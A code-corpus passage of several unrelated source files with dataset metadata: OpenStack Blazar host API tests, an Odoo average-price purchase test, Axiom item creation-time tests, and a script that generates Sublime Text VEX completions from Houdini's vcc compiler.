'extra_capas': kw.get('extra_capas',
{'vgpus': 2, 'fruits': 'bananas'})
}
def fake_computehost_request_body(include=None, **kw):
computehost_body = fake_computehost(**kw)
computehost_body['name'] = kw.get('name',
computehost_body['hypervisor_hostname'])
default_include = set(['name', 'extra_capas'])
include = include or set()
include |= default_include
return dict((key, computehost_body[key])
for key in computehost_body if key in include)
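# Example (hypothetical call): fake_computehost_request_body(include={'vcpus'})
# returns {'name': 'host01', 'extra_capas': {'vgpus': 2, 'fruits': 'bananas'},
# 'vcpus': 1} -- 'name' and 'extra_capas' are always present; `include` only
# adds keys on top of that default set.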
@ddt.ddt
class OsHostAPITestCase(tests.TestCase):
def setUp(self):
super(OsHostAPITestCase, self).setUp()
self.app = make_app()
self.headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.0'}
self.host_id = str('1')
self.mock_ctx = self.patch(api_context, 'ctx_from_headers')
self.mock_ctx.return_value = context.BlazarContext(
user_id='fake', project_id='fake', roles=['member'])
self.get_computehosts = self.patch(service_api.API,
'get_computehosts')
self.create_computehost = self.patch(service_api.API,
'create_computehost')
self.get_computehost = self.patch(service_api.API, 'get_computehost')
self.update_computehost = self.patch(service_api.API,
'update_computehost')
self.delete_computehost = self.patch(service_api.API,
'delete_computehost')
self.list_allocations = self.patch(service_api.API,
'list_allocations')
self.get_allocations = self.patch(service_api.API, 'get_allocations')
def _assert_response(self, actual_resp, expected_status_code,
expected_resp_body, key='host',
expected_api_version='reservation 1.0'):
res_id = actual_resp.headers.get(id.HTTP_RESP_HEADER_REQUEST_ID)
api_version = actual_resp.headers.get(
api_version_request.API_VERSION_REQUEST_HEADER)
self.assertIn(id.HTTP_RESP_HEADER_REQUEST_ID,
actual_resp.headers)
self.assertIn(api_version_request.API_VERSION_REQUEST_HEADER,
actual_resp.headers)
self.assertIn(api_version_request.VARY_HEADER, actual_resp.headers)
self.assertThat(res_id, matchers.StartsWith('req-'))
self.assertEqual(expected_status_code, actual_resp.status_code)
self.assertEqual(expected_resp_body, actual_resp.get_json()[key])
self.assertEqual(expected_api_version, api_version)
self.assertEqual('OpenStack-API-Version', actual_resp.headers.get(
api_version_request.VARY_HEADER))
def test_list(self):
with self.app.test_client() as c:
self.get_computehosts.return_value = []
res = c.get('/v1', headers=self.headers)
self._assert_response(res, 200, [], key='hosts')
def test_list_with_non_acceptable_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.2'}
with self.app.test_client() as c:
res = c.get('/v1', headers=headers)
self.assertEqual(406, res.status_code)
def test_create(self):
with self.app.test_client() as c:
self.create_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.post('/v1', json=fake_computehost_request_body(
id=self.host_id), headers=self.headers)
self._assert_response(res, 201, fake_computehost(
id=self.host_id))
def test_create_with_bad_api_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.a'}
with self.app.test_client() as c:
res = c.post('/v1', json=fake_computehost_request_body(
id=self.host_id), headers=headers)
self.assertEqual(400, res.status_code)
def test_get(self):
with self.app.test_client() as c:
self.get_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.get('/v1/{0}'.format(self.host_id), headers=self.headers)
self._assert_response(res, 200, fake_computehost(id=self.host_id))
def test_get_with_latest_api_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation latest'}
with self.app.test_client() as c:
self.get_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.get('/v1/{0}'.format(self.host_id), headers=headers)
self._assert_response(res, 200, fake_computehost(id=self.host_id),
expected_api_version='reservation 1.0')
def test_update(self):
headers = {'Accept': 'application/json'}
with self.app.test_client() as c:
self.fake_computehost = fake_computehost(id=self.host_id,
name='updated')
self.fake_computehost_body = fake_computehost_request_body(
id=self.host_id,
name='updated'
)
self.update_computehost.return_value = self.fake_computehost
res = c.put('/v1/{0}'.format(self.host_id),
json=self.fake_computehost_body, headers=headers)
self._assert_response(res, 200, self.fake_computehost, 'host')
def test_update_with_no_service_type_in_header(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': '1.0'}
with self.app.test_client() as c:
self.fake_computehost = fake_computehost(id=self.host_id,
name='updated')
self.fake_computehost_body = fake_computehost_request_body(
id=self.host_id,
name='updated'
)
self.update_computehost.return_value = self.fake_computehost
res = c.put('/v1/{0}'.format(self.host_id),
json=self.fake_computehost_body, headers=headers)
self._assert_response(res, 200, self.fake_computehost, 'host')
def test_delete(self):
with self.app.test_client() as c:
self.get_computehosts.return_value = fake_computehost(
id=self.host_id)
res = c.delete('/v1/{0}'.format(self.host_id),
headers=self.headers)
res_id = res.headers.get(id.HTTP_RESP_HEADER_REQUEST_ID)
self.assertEqual(204, res.status_code)
self.assertIn(id.HTTP_RESP_HEADER_REQUEST_ID, res.headers)
self.assertThat(res_id, matchers.StartsWith('req-'))
def test_allocation_list(self):
with self.app.test_client() as c:
self.list_allocations.return_value = []
res = c.get('/v1/allocations', headers=self.headers)
self._assert_response(res, 200, [], key='allocations')
def test_allocation_get(self):
with self.app.test_client() as c:
self.get_allocations.return_value = {}
res = c.get('/v1/{0}/allocation'.format(self.host_id),
headers=self.headers)
self._assert_response(res, 200, {}, key='allocation')
@ddt.data({'lease_id': str(uuidutils.generate_uuid()),
'reservation_id': str(uuidutils.generate_uuid())})
def test_allocation_list_with_query_params(self, query_params):
with self.app.test_client() as c:
res = c.get('/v1/allocations?{0}'.format(query_params),
headers=self.headers)
self._assert_response(res, 200, {}, key='allocations')
@ddt.data({'lease_id': str(uuidutils.generate_uuid()),
'reservation_id': str(uuidutils.generate_uuid())})
def test_allocation_get_with_query_params(self, query_params):
with self.app.test_client() as c:
res = c.get('/v1/{0}/allocation?{1}'.format(
self.host_id, query_params), headers=self.headers)
self._assert_response(res, 200, {}, key='allocation')
|
apache-2.0
| -7,405,516,285,143,847,000 | 43.48954 | 78 | 0.583373 | false |
maxive/erp
|
addons/purchase/tests/test_average_price.py
|
1
|
6253
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import time
from .common import TestPurchase
class TestAveragePrice(TestPurchase):
def test_00_average_price(self):
""" Testcase for average price computation"""
self._load('account', 'test', 'account_minimal_test.xml')
self._load('stock_account', 'test', 'stock_valuation_account.xml')
# Set a product as using average price.
product_icecream = self.env['product.product'].create({
'default_code': 'AVG',
'name': 'Average Ice Cream',
'type': 'product',
'categ_id': self.env.ref('product.product_category_1').id,
'list_price': 100.0,
'standard_price': 60.0,
'uom_id': self.env.ref('uom.product_uom_kgm').id,
'uom_po_id': self.env.ref('uom.product_uom_kgm').id,
'cost_method': 'average',
'valuation': 'real_time',
'property_stock_account_input': self.ref('purchase.o_expense'),
'property_stock_account_output': self.ref('purchase.o_income'),
'supplier_taxes_id': [],
            'description': 'Average Ice Cream',
})
# I create a draft Purchase Order for first incoming shipment for 10 pieces at 60€
purchase_order_1 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': 'Average Ice Cream',
'product_id': product_icecream.id,
'product_qty': 10.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'price_unit': 60.0,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the first purchase order
purchase_order_1.button_confirm()
# Check the "Approved" status of purchase order 1
self.assertEqual(purchase_order_1.state, 'purchase', "Wrong state of purchase order!")
# Process the reception of purchase order 1
picking = purchase_order_1.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
# Check the average_price of the product (average icecream).
self.assertEqual(product_icecream.qty_available, 10.0, 'Wrong quantity in stock after first reception')
self.assertEqual(product_icecream.standard_price, 60.0, 'Standard price should be the price of the first reception!')
# I create a draft Purchase Order for second incoming shipment for 30 pieces at 80€
purchase_order_2 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': product_icecream.name,
'product_id': product_icecream.id,
'product_qty': 30.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'price_unit': 80.0,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the second purchase order
purchase_order_2.button_confirm()
# Process the reception of purchase order 2
picking = purchase_order_2.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
        # Check the standard price: (10 * 60.0 + 30 * 80.0) / 40 = 75.0
self.assertEqual(product_icecream.standard_price, 75.0, 'After second reception, we should have an average price of 75.0 on the product')
# Create picking to send some goods
outgoing_shipment = self.env['stock.picking'].create({
'picking_type_id': self.env.ref('stock.picking_type_out').id,
'location_id': self.env.ref('stock.stock_location_stock').id,
'location_dest_id': self.env.ref('stock.stock_location_customers').id,
'move_lines': [(0, 0, {
'name': 'outgoing_shipment_avg_move',
'product_id': product_icecream.id,
'product_uom_qty': 20.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'location_id': self.env.ref('stock.stock_location_stock').id,
'location_dest_id': self.env.ref('stock.stock_location_customers').id})]
})
# Assign this outgoing shipment and process the delivery
outgoing_shipment.action_assign()
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, outgoing_shipment.id)]}).process()
# Check the average price (60 * 10 + 30 * 80) / 40 = 75.0€ did not change
self.assertEqual(product_icecream.standard_price, 75.0, 'Average price should not have changed with outgoing picking!')
self.assertEqual(product_icecream.qty_available, 20.0, 'Pieces were not picked correctly as the quantity on hand is wrong')
# Make a new purchase order with 500 g Average Ice Cream at a price of 0.2€/g
purchase_order_3 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': product_icecream.name,
'product_id': product_icecream.id,
'product_qty': 500.0,
'product_uom': self.ref('uom.product_uom_gram'),
'price_unit': 0.2,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the first purchase order
purchase_order_3.button_confirm()
# Process the reception of purchase order 3 in grams
picking = purchase_order_3.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
        # Check price is (75.0 * 20 + 200.0 * 0.5) / 20.5 = 78.04878€
        # (0.2€/g is 200€/kg, applied to the 0.5 kg received)
self.assertEqual(product_icecream.qty_available, 20.5, 'Reception of purchase order in grams leads to wrong quantity in stock')
self.assertEqual(round(product_icecream.standard_price, 2), 78.05,
'Standard price as average price of third reception with other UoM incorrect! Got %s instead of 78.05' % (round(product_icecream.standard_price, 2)))
|
agpl-3.0
| -4,236,642,677,800,138,000 | 47.773438 | 161 | 0.591062 | false |
lvh/maxims
|
maxims/test/test_creation.py
|
1
|
2711
|
from axiom import attributes, errors, item, store
from datetime import timedelta
from epsilon import extime
from twisted.trial import unittest
from maxims import creation
class SimpleItem(item.Item):
activations = attributes.integer(default=0)
def activate(self):
self.activations += 1
def _getCreationTime(item):
"""
Gets the _CreationTime object for the given item.
The difference between this and ``creationTime`` is that this exposes
the ``_CreationTime`` object, whereas the latter only shows the creation
time.
"""
CT = creation._CreationTime
return item.store.findUnique(CT, CT.createdItem == item)
class _CreationTimeTests(object):
"""
Assertions for creation time tests.
"""
_DELTA = timedelta(seconds=.1)
def assertCreationTimeStored(self, item):
cT = _getCreationTime(item)
self.assertApproximates(cT.timestamp, extime.Time(), self._DELTA)
self.assertIdentical(creation.creationTime(item), cT.timestamp)
def assertCreationTimeNotStored(self, item):
self.assertRaises(errors.ItemNotFound, creation.creationTime, item)
class LogCreationTests(_CreationTimeTests, unittest.TestCase):
"""
Tests for the function that logs the creation of new objects.
"""
def test_simple(self):
simpleItem = SimpleItem(store=store.Store())
self.assertCreationTimeNotStored(simpleItem)
creation.logCreation(simpleItem)
self.assertCreationTimeStored(simpleItem)
def test_multipleActivations(self):
"""
Tests that the time does not get updated when the item gets
activated twice.
"""
testStore = store.Store()
simpleItem = SimpleItem(store=testStore)
creation.logCreation(simpleItem)
old = _getCreationTime(simpleItem).timestamp
testStore.objectCache.uncache(simpleItem.storeID, simpleItem)
testStore.getItemByID(simpleItem.storeID)
new = _getCreationTime(simpleItem).timestamp
self.assertEqual(old, new)
@creation.creationLogged
class CreationLoggedItem(item.Item):
"""
An item that automatically has its creation logged when it is added to a
store.
"""
dummy = attributes.boolean()
class CreationLoggedTests(_CreationTimeTests, unittest.TestCase):
def test_simple(self):
"""
Tests that an item marked with the decorator gets its creation logged
when it is added to a store.
"""
loggedItem = CreationLoggedItem()
# assertCreationTimeNotStored makes no sense here: store is None
loggedItem.store = store.Store()
self.assertCreationTimeStored(loggedItem)
|
isc
| -3,160,057,430,640,151,600 | 26.383838 | 77 | 0.692733 | false |
WhileRomeBurns/VEX_Syntax
|
src/vcc_utils.py
|
1
|
4987
|
import os
import sys
import re
import subprocess
import json
VCC_PATH = 'C:/Program Files/Side Effects Software/Houdini 16.0.600/bin/vcc.exe'
SYN_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
COMP_PATH = os.path.join(SYN_PATH, 'VEX.sublime-completions')
FUNC_PATH = os.path.join(os.path.join(SYN_PATH, 'syntax_lists'), 'VexFunctions.txt')
def contexts(vcc_path=VCC_PATH):
"""Return a sorted list of all vex contexts."""
ctxs = subprocess.check_output([vcc_path, '-X'])
ctxs = ctxs.decode('ascii').split('\n')
    # split() never yields None; just drop empty lines and any stray '\r'
    return sorted(x.strip() for x in ctxs if x.strip())
def context_functions(context, vcc_path=VCC_PATH, as_set=False):
"""Return the sorted list of all function names for a vex context."""
ctx_info = subprocess.check_output([vcc_path, '-X', context])
ctx_info = ctx_info.decode('ascii')
funcs = set()
    for f in re.findall(r'\w+\(', ctx_info):
if len(f) > 1:
funcs.add(f[:-1])
if as_set:
return funcs
else:
return sorted(list(funcs))
def context_function_signatures(context, vcc_path=VCC_PATH):
ctx_info = subprocess.check_output([vcc_path, '-X', context])
ctx_info = ctx_info.decode('ascii')
sigs = []
    for s in re.findall(r'(\w+(\[\])?) (\w+)\((.*)\)', ctx_info):
sig_str = '%s %s(%s)' % (s[0], s[2], s[3])
if s[3] == 'void':
hint_str = ''
else:
hint_str = '%s\n(%s)' % (s[0], s[3].rstrip().lstrip().rstrip(';'))
args = [x.strip() for x in s[3].split(';')]
sigs.append({'returns':s[0], 'name':s[2], 'ctx':context, 'args':args, 'str':sig_str,
'hint':hint_str})
return sigs
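# Illustrative return value (hypothetical signature; real output depends on the
# installed Houdini build):
#   [{'returns': 'float', 'name': 'noise', 'ctx': 'surface',
#     'args': ['float x'], 'str': 'float noise(float x)',
#     'hint': 'float\n(float x)'}, ...]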
def all_functions(vcc_path=VCC_PATH, write_functions=True, function_path=FUNC_PATH):
"""Returns a sorted list of all vex functions in all contexts."""
all_funcs = set()
for ctx in contexts():
all_funcs.update(context_functions(ctx, as_set=True))
all_funcs_sorted = sorted(all_funcs)
if write_functions:
with open(function_path, 'w') as f:
for func in all_funcs_sorted:
f.write('{}\n'.format(func))
return all_funcs_sorted
def all_function_signatures(vcc_path=VCC_PATH):
all_sigs = []
sig_strs = set()
for ctx in contexts():
ctx_sigs = context_function_signatures(ctx)
for ctx_sig in ctx_sigs:
if ctx_sig['str'] not in sig_strs:
sig_strs.add(ctx_sig['str'])
all_sigs.append(ctx_sig)
return all_sigs
def generate_simple_completions(sublime_completion_path=COMP_PATH):
"""Converts the function signitures generated by vcc into SublimeText compatable completion
JSON files."""
completions = []
for name in all_functions():
completions.append({'trigger' : ('%s\tfunction' % name),
'contents': ('%s(${1})' % name)})
data = {'scope': 'source.vex', 'completions': completions}
with open(sublime_completion_path, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))
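# The emitted file is a plain Sublime Text completions document, e.g. (with a
# hypothetical function name):
#   {"scope": "source.vex",
#    "completions": [{"trigger": "noise\tfunction", "contents": "noise(${1})"}]}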
def generate_completions(sublime_completion_path=COMP_PATH):
"""Converts the function signitures generated by vcc into SublimeText compatable completion
JSON files."""
completions = []
for sig in all_function_signatures():
if len(sig['args']) == 1 and sig['args'][0] == 'void':
comp_arg_fmt = ''
else:
comp_arg_fmt = ''
comp_arg_fmt_no_varadic = ''
c = 1
for arg_type in sig['args']:
comp_arg_fmt += ('${%d:%s}, ' % (c, arg_type))
c += 1
if arg_type != '...':
comp_arg_fmt_no_varadic = comp_arg_fmt
comp_arg_fmt = comp_arg_fmt[:-2] # stripping ', ' before closing parenthesis
comp_arg_fmt_no_varadic = comp_arg_fmt_no_varadic[:-2]
        # in the variadic case, we'll generate two completions - one with and
        # one without the variadic argument ellipsis
if sig['args'][-1] == '...':
new_hint = sig['hint'][:-4]
new_hint = new_hint.rstrip().rstrip(';')
new_hint += ')'
completions.append({'trigger' : ('%s\t%s' % (sig['name'], new_hint)),
'contents': ('%s(%s)' % (sig['name'], comp_arg_fmt_no_varadic))})
completions.append({'trigger' : ('%s\t%s' % (sig['name'], sig['hint'])),
'contents': ('%s(%s)' % (sig['name'], comp_arg_fmt))})
data = {'scope': 'source.vex', 'completions': completions}
with open(sublime_completion_path, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))
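# For a variadic signature such as "float amplitude(float value; ...)" (a
# hypothetical example) this emits two completions: one without the trailing
# ellipsis, "amplitude(${1:float value})", and one with it,
# "amplitude(${1:float value}, ${2:...})".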
if __name__ == '__main__':
if len(sys.argv) < 2:
generate_simple_completions()
elif len(sys.argv) == 2:
generate_simple_completions(sys.argv[1])
else:
        raise Exception('Too many arguments.')
|
mit
| 7,458,347,255,674,271,000 | 33.393103 | 97 | 0.560056 | false |